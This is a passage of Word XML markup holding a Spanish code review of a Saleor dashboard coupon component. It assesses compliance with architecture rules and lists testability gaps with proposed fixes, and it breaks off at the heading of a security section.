      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">C1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sin lógica de servidor / secretos en el cliente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">El SPA solo consume GraphQL; los secretos de Google viven en el backend (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">saleor/saleor/plugins/google_oidc/plugin.py</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, vía</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">os.environ</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">). El cliente no contiene secretos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tipado estricto, sin</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">any</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">❌</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">CouponPracticeButton.tsx:75</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">edge: any</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">),</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">:83</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">e: any</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">) y</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">client.query</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">sin tipo generado por codegen (debilidad de tipado, visible en código). Además ESLint marca funciones sin tipo de retorno:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">CouponPracticeButton.tsx:56,59,66,90</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">y</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">auth.ts:146</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">@typescript-eslint/explicit-function-return-type</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">C3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">i18n vía</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">react-intl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">❌</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">CouponPracticeButton.tsx:118-172</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">— strings en español hardcodeadas (</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">“</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Mostrar cupones que han tenido uso</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">“</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Cargando…</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">“</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Sin usar</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">“</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Vigencia</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">“</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Límite de uso</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">), sin</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">FormattedMessage</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">useIntl</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">C4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Estilos vía tokens macaw-ui, sin CSS global</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">⚠️</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">src/index.css:1-7</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">— el cambio de branding sobrescribe variables del sistema de diseño con</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">!important</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">--mu-colors-background-button-default-primary</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">--mu-colors-text-default1</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">--mu-colors-background-default2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">). Funciona, pero rompe el contrato del design system y es frágil ante upgrades de macaw-ui.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">C5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Organización por dominio + test co-ubicado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">⚠️</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ubicación correcta:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">src/discounts/components/CouponPracticeButton/</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. Pero</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">no</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">hay test co-ubicado (solo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">CouponPracticeButton.tsx</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">+</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">index.ts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">), incumpliendo la convención del repo (471 archivos</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">*.test.*</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">en</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">src/</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">C6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Endpoint único configurable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">El componente usa</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">useApolloClient()</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">y el cliente apunta a</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">window.__SALEOR_CONFIG__.API_URL</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">src/config.ts:24</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">). No hay URL hardcodeada en el código nuevo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Leyenda: ✅ cumple · ⚠️ cumple parcialmente / con riesgo · ❌ incumple.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="X190fb5788506901802c827d228c9cef4837cdb7"/>
      <w:r>
        <w:t xml:space="preserve">1.4 Brechas de testabilidad (≥3) y propuestas de mejora</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">G1 — Componente nuevo sin pruebas.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CouponPracticeButton</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se entregó sin ningún test (no existe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CouponPracticeButton.test.tsx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), pese a que el repositorio mantiene 471 ficheros de test.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Propuesta:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">añadir</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CouponPracticeButton.test.tsx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con Jest + React Testing Library y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">MockedProvider</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de Apollo, cubriendo: estado de carga, lista vacía, filtrado de cupones con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">used &gt; 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, y rama de error.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">G2 — Lógica de negocio acoplada al componente de UI.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">El filtrado (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">solo cupones con uso &gt; 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) y el cálculo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">totalUsed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">viven dentro del componente (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CouponPracticeButton.tsx:77-79</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">:132</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), mezclados con JSX, lo que obliga a renderizar para probarlos.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Propuesta:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">extraer funciones puras</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">filterUsedVouchers(nodes)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sumUsage(codes)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(o un hook</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">useUsedVouchers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) a un módulo aparte y testearlas de forma aislada, sin DOM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">G3 — Datos y red no inyectables /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">impide aserciones tipadas.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">La query se ejecuta con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">client.query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">fetchPolicy: "network-only"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y la respuesta se castea a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">any</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">:75</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), por lo que un test no puede afirmar el contrato de tipos ni simular fácilmente la respuesta.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Propuesta:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">usar el hook tipado generado por codegen (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">usePracticeVouchersQuery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) y tipar la respuesta; esto habilita mocks tipados con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">MockedProvider</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y elimina</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">any</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">G4 (adicional) — Efecto colateral imperativo difícil de aislar.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">En</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">auth.ts:146</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">writeAuthState</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">escribe directamente en la caché de Apollo con un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sin tipo, acoplando la lógica de login a la implementación de la caché.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Propuesta:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tipar el parámetro (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DocumentNode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) e inyectar el cliente como dependencia para poder verificar el estado escrito en pruebas unitarias.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="sección-2-seguridad"/>
      <w:r>
        <w:t xml:space="preserve">Sección 2 — Seguridad</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p>
      <w:pPr>
